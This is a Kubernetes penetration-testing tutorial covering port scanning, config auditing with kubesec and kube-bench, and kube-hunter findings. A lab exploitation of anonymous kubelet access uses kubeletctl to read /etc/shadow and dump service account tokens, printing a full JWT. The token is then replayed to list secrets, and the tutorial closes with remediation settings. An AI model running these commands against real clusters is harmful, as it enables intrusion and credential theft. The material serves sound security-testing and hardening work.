Kubernetes Penetration Testing

Kubernetes is an orchestration system for containers: it automates the deployment and scaling of containerized workloads across a cluster of hosts, and it is frequently paired with Docker.

Kubernetes is sometimes referred to as k8s.

System Components

  • Pods. These are the smallest deployable units of execution and are comprised of one or more containers.
  • Nodes. A node is a machine, physical or virtual, that is responsible for running pods. Nodes are either worker nodes, which run the containers, or master (control-plane) nodes, which manage the cluster. Both can be enumerated with kubectl, as shown below.
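
Where kubectl access is already available (for example, from a compromised administration host), the cluster topology can be enumerated directly. A minimal sketch, assuming a working kubeconfig:

kubectl get nodes -o wide        # nodes and their roles (control-plane/master vs worker)
kubectl get pods -A -o wide      # every pod in every namespace and the node it is scheduled on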

The below table shows the inbound TCP ports Kubernetes uses for communication:

Port(s)        Purpose                   Notes
6443           Kubernetes API server     This service lets you query and manipulate the state of objects in Kubernetes.
2379-2380      etcd server client API    etcd is a consistent and highly-available key-value store used as Kubernetes' backing store for all cluster data.
10250          Kubelet API               Node agent.
10259          kube-scheduler            kube-scheduler watches for newly created Pods with no assigned node, and selects a node for them to run on.
10257          kube-controller-manager   Controllers monitor the state of the cluster, then make or request changes where needed.
30000-32767    NodePort Services         Only found on worker nodes.

We can use Nmap to scan for these and other common Kubernetes-related ports:

nmap -n -T5 -sV -p 443,2379,6666,4194,6443,8443,8080,10250,10259,10257,10255,10256,9099,6782-6784,30000-32767,44134 127.0.0.1
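
Any responsive services can then be probed directly. For example, the API server frequently discloses its version anonymously and the kubelet exposes a health endpoint; the target address below is a placeholder:

curl -k https://<target>:6443/version      # Kubernetes version disclosure
curl -k https://<target>:10250/healthz     # kubelet health state, readable without authentication when misconfigured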

Pod Configuration Auditing

Pods can be defined in YAML documents:

kind: Pod
apiVersion: v1
metadata:
  name: example-pod
spec:
  containers:
    - image: nginx
      name: example-container

The pod can then be created using the kubectl command:

kubectl create -f pod.yaml 
pod/example-pod created
kubectl get pods
NAME          READY   STATUS              RESTARTS   AGE
example-pod   0/1     ContainerCreating   0          35s

The tool KubeSec can be used to audit these configuration files: https://github.com/controlplaneio/kubesec
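
Kubesec can be run as a local binary (as shown below), via its published container image, or against its hosted scanning API. The image tag and endpoint here are taken from the project README and should be verified against the current release:

docker run -i kubesec/kubesec:v2 scan /dev/stdin < pod.yaml
curl -sSX POST --data-binary @pod.yaml https://v2.kubesec.io/scan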

kubectl can be used to export the configuration of currently running pods. First, list the active pods:

kubectl get pods -A

Then use kubectl to export the configuration:

kubectl get pod <podname> --namespace <namespace> -o yaml > podconfig.yaml

The configuration file can then be audited with kubesec.

./kubesec scan pod.yaml 
[
  {
    "object": "Pod/example-pod.default",
    "valid": true,
    "fileName": "pod.yaml",
    "message": "Passed with a score of 0 points",
    "score": 0,
    "scoring": {
      "advise": [
        {
          "id": "ApparmorAny",
          "selector": ".metadata .annotations .\"container.apparmor.security.beta.kubernetes.io/nginx\"",
          "reason": "Well defined AppArmor policies may provide greater protection from unknown threats. WARNING: NOT PRODUCTION READY",
          "points": 3
        },
        {
          "id": "ServiceAccountName",
          "selector": ".spec .serviceAccountName",
          "reason": "Service accounts restrict Kubernetes API access and should be configured with least privilege",
          "points": 3
        },
        {
          "id": "SeccompAny",
          "selector": ".metadata .annotations .\"container.seccomp.security.alpha.kubernetes.io/pod\"",
          "reason": "Seccomp profiles set minimum privilege and secure against unknown threats",
          "points": 1
        },
        {
          "id": "LimitsCPU",
          "selector": "containers[] .resources .limits .cpu",
          "reason": "Enforcing CPU limits prevents DOS via resource exhaustion",
          "points": 1
        },
        {
          "id": "LimitsMemory",
          "selector": "containers[] .resources .limits .memory",
          "reason": "Enforcing memory limits prevents DOS via resource exhaustion",
          "points": 1
        },
        {
          "id": "RequestsCPU",
          "selector": "containers[] .resources .requests .cpu",
          "reason": "Enforcing CPU requests aids a fair balancing of resources across the cluster",
          "points": 1
        },
        {
          "id": "RequestsMemory",
          "selector": "containers[] .resources .requests .memory",
          "reason": "Enforcing memory requests aids a fair balancing of resources across the cluster",
          "points": 1
        },
        {
          "id": "CapDropAny",
          "selector": "containers[] .securityContext .capabilities .drop",
          "reason": "Reducing kernel capabilities available to a container limits its attack surface",
          "points": 1
        },
        {
          "id": "CapDropAll",
          "selector": "containers[] .securityContext .capabilities .drop | index(\"ALL\")",
          "reason": "Drop all capabilities and add only those required to reduce syscall attack surface",
          "points": 1
        },
        {
          "id": "ReadOnlyRootFilesystem",
          "selector": "containers[] .securityContext .readOnlyRootFilesystem == true",
          "reason": "An immutable root filesystem can prevent malicious binaries being added to PATH and increase attack cost",
          "points": 1
        },
        {
          "id": "RunAsNonRoot",
          "selector": "containers[] .securityContext .runAsNonRoot == true",
          "reason": "Force the running image to run as a non-root user to ensure least privilege",
          "points": 1
        },
        {
          "id": "RunAsUser",
          "selector": "containers[] .securityContext .runAsUser -gt 10000",
          "reason": "Run as a high-UID user to avoid conflicts with the host's user table",
          "points": 1
        }
      ]
    }
  }
]
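
The advised items translate directly into a more defensive pod specification. The sketch below incorporates several of them (resource requests and limits, dropped capabilities, a non-root user, a read-only root filesystem); it is illustrative rather than production-ready, and the example-sa service account is hypothetical:

kubectl apply -f - <<'EOF'
kind: Pod
apiVersion: v1
metadata:
  name: example-pod-hardened
spec:
  serviceAccountName: example-sa           # least-privilege service account (assumed to exist)
  containers:
    - image: nginx
      name: example-container
      resources:
        requests:
          cpu: 100m
          memory: 64Mi
        limits:
          cpu: 250m
          memory: 128Mi
      securityContext:
        runAsNonRoot: true
        runAsUser: 10001
        readOnlyRootFilesystem: true       # note: nginx also needs writable emptyDir volumes for its cache/run directories to start like this
        capabilities:
          drop:
            - ALL
EOF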


CIS Benchmarks Host Auditing

Kube-Bench can be used to audit a Kubernetes cluster configuration against CIS benchmarks. The software is available from here: https://github.com/aquasecurity/kube-bench

sudo ./kube-bench --config-dir `pwd`/cfg --config `pwd`/cfg/config.yaml 
[sudo] password for user: 
Warning: Kubernetes version was not auto-detected because kubectl could not connect to the Kubernetes server. This may be because the kubeconfig information is missing or has credentials that do not match the server. Assuming default version 1.18
Warning: Kubernetes version was not auto-detected because kubectl could not connect to the Kubernetes server. This may be because the kubeconfig information is missing or has credentials that do not match the server. Assuming default version 1.18
[INFO] 2 Etcd Node Configuration
[INFO] 2 Etcd Node Configuration Files
[PASS] 2.1 Ensure that the --cert-file and --key-file arguments are set as appropriate (Automated)
[PASS] 2.2 Ensure that the --client-cert-auth argument is set to true (Automated)
[PASS] 2.3 Ensure that the --auto-tls argument is not set to true (Automated)
[PASS] 2.4 Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate (Automated)
[PASS] 2.5 Ensure that the --peer-client-cert-auth argument is set to true (Automated)
[PASS] 2.6 Ensure that the --peer-auto-tls argument is not set to true (Automated)
[PASS] 2.7 Ensure that a unique Certificate Authority is used for etcd (Manual)

== Summary etcd ==
7 checks PASS
0 checks FAIL
0 checks WARN
0 checks INFO

[INFO] 4 Worker Node Security Configuration
[INFO] 4.1 Worker Node Configuration Files
[PASS] 4.1.1 Ensure that the kubelet service file permissions are set to 644 or more restrictive (Automated)
[PASS] 4.1.2 Ensure that the kubelet service file ownership is set to root:root (Automated)
[PASS] 4.1.3 If proxy kubeconfig file exists ensure permissions are set to 644 or more restrictive (Manual)
[PASS] 4.1.4 Ensure that the proxy kubeconfig file ownership is set to root:root (Manual)
[PASS] 4.1.5 Ensure that the --kubeconfig kubelet.conf file permissions are set to 644 or more restrictive (Automated)
[PASS] 4.1.6 Ensure that the --kubeconfig kubelet.conf file ownership is set to root:root (Manual)
[PASS] 4.1.7 Ensure that the certificate authorities file permissions are set to 644 or more restrictive (Manual)
[PASS] 4.1.8 Ensure that the client certificate authorities file ownership is set to root:root (Manual)
[PASS] 4.1.9 Ensure that the kubelet --config configuration file has permissions set to 644 or more restrictive (Automated)
[PASS] 4.1.10 Ensure that the kubelet --config configuration file ownership is set to root:root (Automated)
[INFO] 4.2 Kubelet
[FAIL] 4.2.1 Ensure that the anonymous-auth argument is set to false (Automated)
[FAIL] 4.2.2 Ensure that the --authorization-mode argument is not set to AlwaysAllow (Automated)
[PASS] 4.2.3 Ensure that the --client-ca-file argument is set as appropriate (Automated)
[PASS] 4.2.4 Ensure that the --read-only-port argument is set to 0 (Manual)
[PASS] 4.2.5 Ensure that the --streaming-connection-idle-timeout argument is not set to 0 (Manual)
[FAIL] 4.2.6 Ensure that the --protect-kernel-defaults argument is set to true (Automated)
[PASS] 4.2.7 Ensure that the --make-iptables-util-chains argument is set to true (Automated)
[PASS] 4.2.8 Ensure that the --hostname-override argument is not set (Manual)
[WARN] 4.2.9 Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture (Manual)
[WARN] 4.2.10 Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate (Manual)
[PASS] 4.2.11 Ensure that the --rotate-certificates argument is not set to false (Manual)
[PASS] 4.2.12 Verify that the RotateKubeletServerCertificate argument is set to true (Manual)
[WARN] 4.2.13 Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers (Manual)
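
Individual sections can be re-run after remediation. The run subcommand and its --targets and --check options are taken from the kube-bench documentation and vary slightly between versions:

sudo ./kube-bench run --targets node                       # worker-node checks only
sudo ./kube-bench run --targets node --check 4.2.1,4.2.2   # re-test the failed kubelet checks above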

KubeHunter

kube-hunter is an open-source tool that hunts for security issues in Kubernetes clusters. The software can be downloaded from here: https://github.com/aquasecurity/kube-hunter

Running the tool remotely against a Kubernetes cluster, we can see multiple issues have been identified:

./kube-hunter-linux-x86_64-refs.tags.v0.6.8 --active
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Interface scanning   (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 3
CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): 192.168.1.0/24
2022-07-22 15:00:11,950 INFO kube_hunter.modules.report.collector Started hunting
2022-07-22 15:00:11,956 INFO kube_hunter.modules.report.collector Discovering Open Kubernetes Services
2022-07-22 15:00:12,072 INFO kube_hunter.modules.report.collector Found open service "Kubelet API" at 192.168.1.133:10250
2022-07-22 15:00:12,075 INFO kube_hunter.modules.report.collector Found open service "Kubelet API" at 192.168.1.109:10250
2022-07-22 15:00:12,079 INFO kube_hunter.modules.report.collector Found open service "Kubelet API" at 192.168.1.76:10250
2022-07-22 15:00:12,080 INFO kube_hunter.modules.report.collector Found vulnerability "Anonymous Authentication" in 192.168.1.76:10250
2022-07-22 15:00:12,118 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Pods" in 192.168.1.76:10250
2022-07-22 15:00:12,119 INFO kube_hunter.modules.report.collector Found vulnerability "Cluster Health Disclosure" in 192.168.1.76:10250
2022-07-22 15:00:12,122 INFO kube_hunter.modules.report.collector Found open service "API Server" at 192.168.1.76:6443
2022-07-22 15:00:12,126 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Running Pods" in 192.168.1.76:10250
2022-07-22 15:00:12,128 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Kubelet Cmdline" in 192.168.1.76:10250
2022-07-22 15:00:12,131 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Container Logs" in 192.168.1.76:10250
2022-07-22 15:00:12,137 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Run Inside Container" in 192.168.1.76:10250
2022-07-22 15:00:12,139 INFO kube_hunter.modules.report.collector Found vulnerability "K8s Version Disclosure" in 192.168.1.76:6443
2022-07-22 15:00:12,151 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed System Logs" in 192.168.1.76:10250
2022-07-22 15:00:12,515 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Existing Privileged Container(s) Via Secure Kubelet Port" in 192.168.1.76:10250

Nodes
+-------------+---------------+
| TYPE        | LOCATION      |
+-------------+---------------+
| Node/Master | 192.168.1.133 |
+-------------+---------------+
| Node/Master | 192.168.1.109 |
+-------------+---------------+
| Node/Master | 192.168.1.76  |
+-------------+---------------+

Detected Services
+-------------+---------------------+----------------------+
| SERVICE     | LOCATION            | DESCRIPTION          |
+-------------+---------------------+----------------------+
| Kubelet API | 192.168.1.76:10250  | The Kubelet is the   |
|             |                     | main component in    |
|             |                     | every Node, all pod  |
|             |                     | operations goes      |
|             |                     | through the kubelet  |
+-------------+---------------------+----------------------+
| Kubelet API | 192.168.1.133:10250 | The Kubelet is the   |
|             |                     | main component in    |
|             |                     | every Node, all pod  |
|             |                     | operations goes      |
|             |                     | through the kubelet  |
+-------------+---------------------+----------------------+
| Kubelet API | 192.168.1.109:10250 | The Kubelet is the   |
|             |                     | main component in    |
|             |                     | every Node, all pod  |
|             |                     | operations goes      |
|             |                     | through the kubelet  |
+-------------+---------------------+----------------------+
| API Server  | 192.168.1.76:6443   | The API server is in |
|             |                     | charge of all        |
|             |                     | operations on the    |
|             |                     | cluster.             |
+-------------+---------------------+----------------------+

Vulnerabilities
For further information about a vulnerability, search its ID in: 
https://avd.aquasec.com/
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| ID     | LOCATION           | MITRE CATEGORY       | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV051 | 192.168.1.76:10250 | Privilege Escalation | Exposed Existing     | A malicious actor,   | The following        |
|        |                    | // Privileged        | Privileged           | that has confirmed   | exposed existing     |
|        |                    | container            | Container(s) Via     | anonymous access to  | privileged           |
|        |                    |                      | Secure Kubelet Port  | the API via the      | containers were not  |
|        |                    |                      |                      | kubelet's secure     | successfully abused  |
|        |                    |                      |                      | port, can leverage   | by                   |
|        |                    |                      |                      | the existing         | starting/modify...   |
|        |                    |                      |                      | privileged           |                      |
|        |                    |                      |                      | containers           |                      |
|        |                    |                      |                      | identified to damage |                      |
|        |                    |                      |                      | the host and         |                      |
|        |                    |                      |                      | potentially the      |                      |
|        |                    |                      |                      | whole cluster        |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV043 | 192.168.1.76:10250 | Initial Access //    | Cluster Health       | By accessing the     | status: ok           |
|        |                    | General Sensitive    | Disclosure           | open /healthz        |                      |
|        |                    | Information          |                      | handler,             |                      |
|        |                    |                      |                      |     an attacker      |                      |
|        |                    |                      |                      | could get the        |                      |
|        |                    |                      |                      | cluster health state |                      |
|        |                    |                      |                      | without              |                      |
|        |                    |                      |                      | authenticating       |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV036 | 192.168.1.76:10250 | Initial Access //    | Anonymous            | The kubelet is       | The following        |
|        |                    | Exposed sensitive    | Authentication       | misconfigured,       | containers have been |
|        |                    | interfaces           |                      | potentially allowing | successfully         |
|        |                    |                      |                      | secure access to all | breached.            |
|        |                    |                      |                      | requests on the      |                      |
|        |                    |                      |                      | kubelet,             | Pod namespace: kube- |
|        |                    |                      |                      |     without the need | flannel              |
|        |                    |                      |                      | to authenticate      |                      |
|        |                    |                      |                      |                      | Pod ID: kube...      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV002 | 192.168.1.76:6443  | Initial Access //    | K8s Version          | The kubernetes       | v1.24.3              |
|        |                    | Exposed sensitive    | Disclosure           | version could be     |                      |
|        |                    | interfaces           |                      | obtained from the    |                      |
|        |                    |                      |                      | /version endpoint    |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV040 | 192.168.1.76:10250 | Execution // Exec    | Exposed Run Inside   | An attacker could    | uname -a: rpc error: |
|        |                    | into container       | Container            | run an arbitrary     | code = Unknown desc  |
|        |                    |                      |                      | command inside a     | = failed to exec in  |
|        |                    |                      |                      | container            | container: failed to |
|        |                    |                      |                      |                      | start exec           |
|        |                    |                      |                      |                      | "86ddae...           |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV052 | 192.168.1.76:10250 | Discovery // Access  | Exposed Pods         | An attacker could    | count: 8             |
|        |                    | Kubelet API          |                      | view sensitive       |                      |
|        |                    |                      |                      | information about    |                      |
|        |                    |                      |                      | pods that are        |                      |
|        |                    |                      |                      |     bound to a Node  |                      |
|        |                    |                      |                      | using the /pods      |                      |
|        |                    |                      |                      | endpoint             |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV046 | 192.168.1.76:10250 | Discovery // Access  | Exposed Kubelet      | Commandline flags    | cmdline: /usr/bin/ku |
|        |                    | Kubelet API          | Cmdline              | that were passed to  | belet--bootstrap-ku  |
|        |                    |                      |                      | the kubelet can be   | beconfig=/etc/kubern |
|        |                    |                      |                      | obtained from the    | etes/bootstrap-kubel |
|        |                    |                      |                      | pprof endpoints      | et.conf--kubeconfig  |
|        |                    |                      |                      |                      | ...                  |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV045 | 192.168.1.76:10250 | Discovery // Access  | Exposed System Logs  | System logs are      | Could not parse      |
|        |                    | Kubelet API          |                      | exposed from the     | system logs          |
|        |                    |                      |                      | /logs endpoint on    |                      |
|        |                    |                      |                      | the kubelet          |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV038 | 192.168.1.76:10250 | Discovery // Access  | Exposed Running Pods | Outputs a list of    | 8 running pods       |
|        |                    | Kubelet API          |                      | currently running    |                      |
|        |                    |                      |                      | pods,                |                      |
|        |                    |                      |                      |     and some of      |                      |
|        |                    |                      |                      | their metadata,      |                      |
|        |                    |                      |                      | which can reveal     |                      |
|        |                    |                      |                      | sensitive            |                      |
|        |                    |                      |                      | information          |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV037 | 192.168.1.76:10250 | Discovery // Access  | Exposed Container    | Output logs from a   | coredns: .:53        |
|        |                    | Kubelet API          | Logs                 | running container    | [INFO]               |
|        |                    |                      |                      | are using the        | plugin/reload:       |
|        |                    |                      |                      | exposed              | Running              |
|        |                    |                      |                      | /containerLogs       | configuration MD5 =  |
|        |                    |                      |                      | endpoint             | db32ca3650231d74073f |
|        |                    |                      |                      |                      | f4cf814959a7         |
|        |                    |                      |                      |                      | Cor...               |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+

Further information on how to remediate the vulnerabilities identified can be found on the Kube-Hunter website: https://aquasecurity.github.io/kube-hunter/kbindex.html

If authentication is required to communicate with the service, a service account token can be passed:

./kube-hunter-linux-x86_64-refs.tags.v0.6.8 --active --service-account <service_token>
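
For unattended scans, the interactive menu can be skipped and the findings exported for reporting. The --remote and --report flags below are taken from the kube-hunter documentation; confirm them against the build in use:

./kube-hunter-linux-x86_64-refs.tags.v0.6.8 --remote 192.168.1.76 --report json > kube-hunter-results.json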

Exploiting Anonymous Kubelet Authentication

Kubernetes uses client certificates, bearer tokens, or an authenticating proxy to authenticate API requests. Brute-forcing these credentials is infeasible.

However, if anonymous access is enabled and authorization is set to AlwaysAllow, we can interface with the Kubelet API directly. The vulnerable configuration, recreated here in a lab, looks like this:

head -n 15 /var/lib/kubelet/config.yaml 
apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
  anonymous:
    enabled: true
  webhook:
    cacheTTL: 0s
    enabled: true
  x509:
    clientCAFile: /etc/kubernetes/pki/ca.crt
authorization:
  mode: AlwaysAllow
  webhook:
    cacheAuthorizedTTL: 0s
    cacheUnauthorizedTTL: 0s
cgroupDriver: systemd

Restart the service after making the change:

systemctl restart kubelet

The API can now be queried directly using curl:

curl -k https://192.168.1.76:10250/pods
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"kube-apiserver-master","namespace":"kube-system","uid":"6b09112839c4a4c5f099ad48e7cfed63","creationTimestamp":null,"labels":{"component":"kube-apiserver","tier":"control-plane"},"annotations":{"kubeadm.kubernetes.io/kube-apiserver.advertise-address.endpoint":"192.168.1.76:6443","kubernetes.io/config.hash":"6b09112839c4a4c5f099ad48e7cfed63","kubernetes.io/config.seen":"2022-07-22T13:53:31.425085559Z","kubernetes.io/config.source":"file"}},"spec":{"volumes":[{"name":"ca-certs","hostPath":{"path":"/etc/ssl/certs","type":"DirectoryOrCreate"}},{"name":"etc-ca-certificates","hostPath":{"path":"/etc/ca-certificates","type":"DirectoryOrCreate"}},{"name":"etc-pki","hostPath":{"path":"/etc/pki","type":"DirectoryOrCreate"}},{"name":"k8s-certs","hostPath":{"path":"/etc/kubernetes/pki","type":"DirectoryOrCreate"}},{"name":"usr-local-share-ca-certificates","hostPath":{"path
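
Other read and exec endpoints on the kubelet are worth probing once anonymous access is confirmed. These are standard kubelet API paths; the /run request mirrors what kubeletctl automates below:

curl -k https://192.168.1.76:10250/runningpods/    # pods currently running on this node
curl -k https://192.168.1.76:10250/logs/           # node and container log directory listing
curl -k https://192.168.1.76:10250/metrics         # kubelet metrics, which reveal pod and volume names
curl -k -X POST "https://192.168.1.76:10250/run/<namespace>/<pod>/<container>" -d "cmd=id"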

An easier way of interacting with the service is to use the kubeletctl tool: https://github.com/cyberark/kubeletctl

./kubeletctl_linux_amd64 --server 192.168.1.76 run "cat /etc/shadow" -i --all-pods
[*] Running command on all pods
1. Pod: kube-scheduler-master
   Namespace: kube-system
   Container: kube-scheduler
   Url: https://192.168.1.76:10250/run/kube-system/kube-scheduler-master/kube-scheduler
   Output: 
container not found ("kube-scheduler")


2. Pod: kube-controller-manager-master
   Namespace: kube-system
   Container: kube-controller-manager
   Url: https://192.168.1.76:10250/run/kube-system/kube-controller-manager-master/kube-controller-manager
   Output: 
container not found ("kube-controller-manager")


3. Pod: kube-proxy-gt456
   Namespace: kube-system
   Container: kube-proxy
   Url: https://192.168.1.76:10250/run/kube-system/kube-proxy-gt456/kube-proxy
   Output: 
container not found ("kube-proxy")


4. Pod: kube-apiserver-master
   Namespace: kube-system
   Container: kube-apiserver
   Url: https://192.168.1.76:10250/run/kube-system/kube-apiserver-master/kube-apiserver
   Output: 
container not found ("kube-apiserver")


5. Pod: coredns-6d4b75cb6d-2gxrm
   Namespace: kube-system
   Container: coredns
   Url: https://192.168.1.76:10250/run/kube-system/coredns-6d4b75cb6d-2gxrm/coredns
   Output: 
container not found ("coredns")


6. Pod: kube-flannel-ds-nk7cf
   Namespace: kube-flannel
   Container: kube-flannel
   Url: https://192.168.1.76:10250/run/kube-flannel/kube-flannel-ds-nk7cf/kube-flannel
   Output: 
root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
ipsec:!:19149:0:99999:7:::
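
Beyond run, kubeletctl provides several helper subcommands. The pods and scan rce subcommands are assumed from the project README and should be confirmed against the release in use:

./kubeletctl_linux_amd64 --server 192.168.1.76 pods                       # list the pods visible to this kubelet
./kubeletctl_linux_amd64 --server 192.168.1.76 scan rce                   # identify containers that allow command execution
./kubeletctl_linux_amd64 --server 192.168.1.76 run "env" -i --all-pods    # environment variables frequently contain credentials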

Service Account Access

Containers that need to communicate with the Kubernetes API directly hold a service account token at /var/run/secrets/kubernetes.io/serviceaccount/token. This is a JSON Web Token (JWT). Depending on the rights assigned to the token, we may be able to use it to further compromise the cluster.

./kubeletctl_linux_amd64 --server 192.168.1.76 run "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -i --all-pods
5. Pod: kube-flannel-ds-nk7cf
   Namespace: kube-flannel
   Container: kube-flannel
   Url: https://192.168.1.76:10250/run/kube-flannel/kube-flannel-ds-nk7cf/kube-flannel
   Output: 
eyJhbGciOiJSUzI1NiIsImtpZCI6IlEtVzNTcDg2QTQyZDN2OWdFQVRfSDEzMEdtdkgwNUlpZ1dib3hwNXRsb0UifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjkwMDM0MDUwLCJpYXQiOjE2NTg0OTgwNTAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJrdWJlLWZsYW5uZWwiLCJwb2QiOnsibmFtZSI6Imt1YmUtZmxhbm5lbC1kcy1uazdjZiIsInVpZCI6IjJmZjQ5NThiLWQ2OTMtNGZhNS1hOTBkLWFhNDE2MjUwNGNiYiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZmxhbm5lbCIsInVpZCI6IjYyMmU1NDc4LWViOWQtNDJmOC04Nzg2LTM0MjBmZmM3NmU5NyJ9LCJ3YXJuYWZ0ZXIiOjE2NTg1MDE2NTd9LCJuYmYiOjE2NTg0OTgwNTAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDprdWJlLWZsYW5uZWw6Zmxhbm5lbCJ9.lvody5McZIXdXAiToTfJpBZmrnDGYXtaH_eUPJKbw1Boxqq67m8CRa-59SK7Vellzu9jOsAHdtq5ziEir1hJCJhVA85qATUpeArskKNyFX1bIgFCTgFsRvhi_BYtpOQ2-h8IX_qyybYoeFSfpCWo4ubS90ntYAH7AHyLKt6eteyXfTIXUz12Z53HFYVg9WWKKUSKa-sH6vrqLW1-BqglUuiL0MujEtXHqxv2H0Kj2ZV09zc7MHdF85ku_mKk4bOwv0v06iE0tpFIruv4MfZlyGHuivv2My-SwX8eVNjI03iisn66BH91f2yLbksjkblWjeva32OlcFJfelZYwgV3Kg
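
A recovered token can be replayed against the API server with kubectl to establish what it is permitted to do. A minimal sketch, assuming the token above has been saved to the file token.jwt:

TOKEN=$(cat token.jwt)
kubectl --server=https://192.168.1.76:6443 --token="$TOKEN" --insecure-skip-tls-verify=true auth can-i --list
kubectl --server=https://192.168.1.76:6443 --token="$TOKEN" --insecure-skip-tls-verify=true get secrets -A   # only succeeds if the account is over-privileged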


Kubesploit

Kubesploit is a cross-platform post-exploitation HTTP/2 command-and-control server and agent dedicated to containerized environments. The software can be downloaded from here: https://github.com/cyberark/kubesploit

Kubesploit supports a number of audit features:

  • Container breakout using mounting
  • Container breakout using docker.sock
  • Container breakout using CVE-2019-5736 exploit
  • Scan for Kubernetes cluster known CVEs
  • Port scanning with focus on Kubernetes services
  • Kubernetes service scan from within the container
  • Light kubeletctl
  • cGroup breakout
  • Kernel module breakout
  • Var log escape
  • Deepce: Docker enumeration (Open-Source project integrated as a module)
  • Vulnerability test: check which of Kubesploit's exploits your container is vulnerable to

Closing Thoughts

Kubernetes is generally secure by default in newer releases: clusters deployed with current tooling ship with strong authentication, anonymous kubelet access disabled, and Webhook (rather than AlwaysAllow) authorization. In practice, the issues identified during penetration tests are therefore usually the result of misconfiguration rather than weaknesses in Kubernetes itself.
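
For the kubelet weaknesses exploited above, remediation means reverting to the secure settings. The fragment below is a sketch of the relevant part of /var/lib/kubelet/config.yaml (merge it into the existing file on each node rather than replacing it, then restart the kubelet):

authentication:
  anonymous:
    enabled: false        # CIS check 4.2.1 - reject unauthenticated requests
  webhook:
    enabled: true
authorization:
  mode: Webhook           # CIS check 4.2.2 - never AlwaysAllow

sudo systemctl restart kubelet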